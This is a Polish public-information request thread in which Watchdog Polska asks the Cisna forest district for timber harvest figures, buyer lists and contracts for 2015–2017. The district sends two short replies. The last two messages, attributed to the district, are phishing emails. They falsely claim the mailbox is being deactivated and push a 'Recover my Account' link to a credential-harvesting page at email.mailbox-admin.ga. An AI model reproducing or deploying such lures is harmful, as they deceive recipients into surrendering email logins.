'

Zadania

Brak wierszy.

Treść

 • Wniosek o udostępnienie informacji publicznej przez adobrawy

  Stowarzyszenie Sieć Obywatelska Watchdog Polska wnosi o udostępnienie następujących informacji:

  - informacji o liczbie pozyskanego drewna osobno w latach 2015, 2016, 2017 (do dnia złożenia niniejszego wniosku),
  - informacji o tym komu przekazane zostało uzyskane drzewo - osobno latach 2015, 2016, 2017 r. do dnia złożenia niniejszego wniosku poprzez podanie listy odbiorców,
  - skany umów, związanych z gospodarowanie uzyskanym drzewem w zakresie jakim odbiorcom drewna nie były osoby fizyczne.

  Stowarzyszenie wnosi o udostępnienie wskazanych informacji w formie elektronicznej, na adres e-mail {{EMAIL}}.

  Bartosz Wilk, Szymon Osowski - członkowie zarządu, zgodnie z zasadami reprezentacji

 • Odpowiedź na wniosek o udostępnienie informacji przez Nadleśnictwo Cisna

  Nadleśnictwo Cisna przesyła odpowiedź na Państwa zapytanie.

  Paweł Ogorzały

  Spec. ds. użytkowania lasu i ochrony przyrody

  Nadleśnictwo Cisna

  Cisna 87A, 38-607 Cisna

  Tel. 13 4686340

  Załączniki

 • RE: Wniosek o udostępnienie informacji publicznej przez Nadleśnictwo Cisna

  Nadleśnictwo Cisna przesyła odpowiedź na złożony wniosek o udostępnienie informacji publicznej.

  Nadleśnictwo Cisna
  Paweł Ogorzały
  Spec. d.s. Użytkowania i Ochrony Przyrody

 • Account Recovery!!! przez Nadleśnictwo Cisna

  Account Recovery Message


  Dear sprawa-3107@fedrowanie.siecobywatelska.pl Our record indicates that you recently made a request to deactivate this "sprawa-3107@fedrowanie.siecobywatelska.pl" email And this request will be processed shortly.
  If this request was made accidentally and you have no knowledge of it, you are advised to recover your account now


  Recover My Account


  However, if you do not cancel this request, your account will be de-activated shortly
  and all your email data will be lost permanently. Regards.
  Email IT Administrator

  This message is auto-generated from E-mail IT security server, and replies sent to this email can not be delivered.
  This email is meant for: sprawa-3107@fedrowanie.siecobywatelska.pl

 • Account Security Alert 2019!!! przez Nadleśnictwo Cisna


  | | |
  | Account Recovery Message
  ---


  | **Dear %0%**

  Our registration indicates that you have recently requested the deactivation
  of this **"%0%"** e-mail and this request will be processed shortly.

  If this request was made accidentally and you have no knowledge about it, we
  recommend that you recover your account now.


  ---


  |

  [Recover my Account](http://email.mailbox-admin.ga/LOGINZ/LOGINZ/mail-
  service/encryptedE/encryptedEN/index.php?email=%0%)

  ---


  | However, if you do not cancel this request, your account will soon be
  deactivated and all your email data will be lost permanently.

  Regards.

  **Send an email to the administrator**.


  ---


  |

  * * *

  ---
  | **This message is automatically generated from the IT e-mail server and
  responses sent to this e-mail can not be provided** **.**
  **This email address is for** : **%0%**
  ---